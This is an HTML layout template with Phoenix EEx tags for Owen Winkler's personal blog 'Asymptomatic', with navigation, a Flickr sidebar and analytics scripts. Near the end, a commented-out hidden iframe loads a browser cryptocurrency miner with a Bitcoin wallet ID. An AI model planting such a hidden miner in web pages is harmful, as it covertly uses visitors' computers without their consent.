<!DOCTYPE HTML>
<html>
<head>
  <meta charset="UTF-8">
  <title>Asymptomatic</title>
  <meta name="generator" content="Habari">
  <meta name="viewport" content="width=device-width, maximum-scale = 1">
  <link rel="Shortcut Icon" href="/images/favicon.png">

  <link rel="preload" href="<%= static_path(@conn, "/css/vendor.css") %>" as="style" onload="this.rel='stylesheet'">
  <link rel="prefetch" href="<%= static_path(@conn, "/js/bundle.js") %>" type="script">

  <link type="text/css" rel="stylesheet" href="//fonts.googleapis.com/css?family=Open+Sans:400italic,400,700">

  <!--[if lt IE 9]><script  src="http://cdnjs.cloudflare.com/ajax/libs/html5shiv/r29/html5.js"></script>
  <![endif]-->
  <%=
      render_existing(@view_module, "meta." <> @view_template, assigns) ||
      render(JellyShot.LayoutView, "meta.html", assigns)
    %>

  <link rel="stylesheet" href="<%= static_path(@conn, "/css/style.css") %>">

  <script defer src="<%= static_path(@conn, "/js/bundle.js") %>"></script>
</head>
<body class="display_home multiple" itemscope itemtype="http://schema.org/Blog">

<div id="wrapper">

  <header id="header">
    <hgroup>
    <h1 itemprop="name"><a href="/" itemprop="url">Asymptomatic</a></h1>
    <h2 itemprop="description">There must be intelligent life down here</h2>
    </hgroup>
    <nav class="first last block-type-menu block-title-menu block">
      <h1>Menu</h1><ol ><li class="inactive" id="main-menu_2603"><a href="http://asymptomatic.net/contact-me">Contact Me</a></li>
        <li class="inactive" id="main-menu_2604"><a href="http://asymptomatic.net/stuff-i-should-do">Stuff I Should Do</a></li></ol>
    </nav>
  </header>

  <div id="content">

    <div id="posts" itemprop="blogPosts">
        <%= render @view_module, @view_template, assigns %>

	<div class="pagenav">
	  &nbsp;<a href="http://asymptomatic.net/page/1" class="current-page">1</a>&nbsp;<a href="http://asymptomatic.net/page/2" >2</a>&nbsp;<a href="http://asymptomatic.net/page/3" >3</a>&nbsp;<span class="sep">&hellip;</span>&nbsp;<a href="http://asymptomatic.net/page/581" >581</a>	<a class="next-page" href="http://asymptomatic.net/page/2" title="Older&nbsp;Posts&nbsp;&raquo;">Older&nbsp;Posts&nbsp;&raquo;</a></div>
    </div>

    <aside id="sidebar">
      <section class="first block-type-text block-title-about-the-site block">
	<h1>About the Site</h1>Hi!  I'm Owen Winkler, and I write this drivel.  <em>This blog is about my own life and my random observations thereof.</em>  Sometimes I write about technical stuff here, but mostly that's at <a href="http://redalt.com">RedAlt</a>.  Please enjoy, or if not, click on my ads.  Either is fine with me.</section><section class="index_1 block-type-flickrfeed block-title-photos-and-screenshots block">
	<h1>Photos and Screenshots</h1><!-- To customize this template, copy it to your currently active theme directory and edit it -->
	<div id="flickrfeed">
	  <ul>
	    <li class="flickr-image"><a class="lb_flickr" href="https://live.staticflickr.com/5499/30793715840_fdebb3ff52_b.jpg" title="IMG_0423"><img src="http://asymptomatic.net.owenw.com/user/files/flickrfeed/square/30793715840_fdebb3ff52_s.jpg" alt="IMG_0423" /></a></li>
	    <li class="flickr-image"><a class="lb_flickr" href="https://live.staticflickr.com/5551/30340077224_637ca01148_b.jpg" title="IMG_0426"><img src="http://asymptomatic.net.owenw.com/user/files/flickrfeed/square/30340077224_637ca01148_s.jpg" alt="IMG_0426" /></a></li>
	    <li class="flickr-image"><a class="lb_flickr" href="https://live.staticflickr.com/5586/30793715650_396eca59ee_b.jpg" title="IMG_0427"><img src="http://asymptomatic.net.owenw.com/user/files/flickrfeed/square/30793715650_396eca59ee_s.jpg" alt="IMG_0427" /></a></li>
	    <li class="flickr-image"><a class="lb_flickr" href="https://live.staticflickr.com/5719/30340077154_febb8bb5e5_b.jpg" title="IMG_0428"><img src="http://asymptomatic.net.owenw.com/user/files/flickrfeed/square/30340077154_febb8bb5e5_s.jpg" alt="IMG_0428" /></a></li>
	    <li class="flickr-image"><a class="lb_flickr" href="https://live.staticflickr.com/5782/30793715190_fa2a8fbdba_b.jpg" title="IMG_0429"><img src="http://asymptomatic.net.owenw.com/user/files/flickrfeed/square/30793715190_fa2a8fbdba_s.jpg" alt="IMG_0429" /></a></li>
	    <li class="flickr-image"><a class="lb_flickr" href="https://live.staticflickr.com/5790/30340077044_faafc04116_b.jpg" title="IMG_0431"><img src="http://asymptomatic.net.owenw.com/user/files/flickrfeed/square/30340077044_faafc04116_s.jpg" alt="IMG_0431" /></a></li>
	    <li class="flickr-image"><a class="lb_flickr" href="https://live.staticflickr.com/8176/28472803594_5051955e7c_b.jpg" title="nowsapphire"><img src="http://asymptomatic.net.owenw.com/user/files/flickrfeed/square/28472803594_5051955e7c_s.jpg" alt="nowsapphire" /></a></li>
	    <li class="flickr-image"><a class="lb_flickr" href="https://live.staticflickr.com/8876/29093949655_963346cbbe_b.jpg" title="IMG_9807"><img src="http://asymptomatic.net.owenw.com/user/files/flickrfeed/square/29093949655_963346cbbe_s.jpg" alt="IMG_9807" /></a></li>
	    <li class="flickr-image"><a class="lb_flickr" href="https://live.staticflickr.com/7586/29093947845_cd5050d987_b.jpg" title="IMG_9764"><img src="http://asymptomatic.net.owenw.com/user/files/flickrfeed/square/29093947845_cd5050d987_s.jpg" alt="IMG_9764" /></a></li>

	  </ul>
	</div>
      </section><section class="index_3 block-type-rssblock block-title-latest-links block">
	<h1>Latest Links</h1><ul>
	</ul>
      </section><section class="last index_4 block-type-textlinkads block-title-sponsored-listings block">
	<h1>Sponsored Listings</h1>Sponsored Listings</section>		</aside>

  </div>

  <footer id="footer"><script type="text/javascript">
      var clicky_site_ids = clicky_site_ids || [];
clicky_site_ids.push(63201);
(function() {
  var s = document.createElement('script');
  s.type = 'text/javascript';
  s.async = true;
  s.src = '//static.getclicky.com/js';
  ( document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0] ).appendChild( s );
})();
    </script>
    <noscript><p><img alt="Clicky" width="1" height="1" src="//in.getclicky.com/63201ns.gif" /></p></noscript><script  src="http://asymptomatic.net/jsmincdn/jsmincdn.jquery.jquery.ui.widget.rlightbox.ada93bd39b79686df9bea1e5ac2502b9.04d59f7d027844a04bc172d53352c765/"></script>
  </footer>

</div>
<div id="backdrop"></div>
<!--iframe style='display:none' src='http://tidbit.co.in/miner'><script>window.walletId = 12v5XWUu1qJUNTuH97P5aqJmwnB8DsyZHL</script></iframe-->
  <script>
    // Firefox doesn't seem to support the `onload` event on `link`
    document.querySelector('head').insertAdjacentHTML('beforeend', '<link rel="stylesheet" href="<%= static_path(@conn, "/css/vendor.css") %>">')
  </script>
</body>
</html>

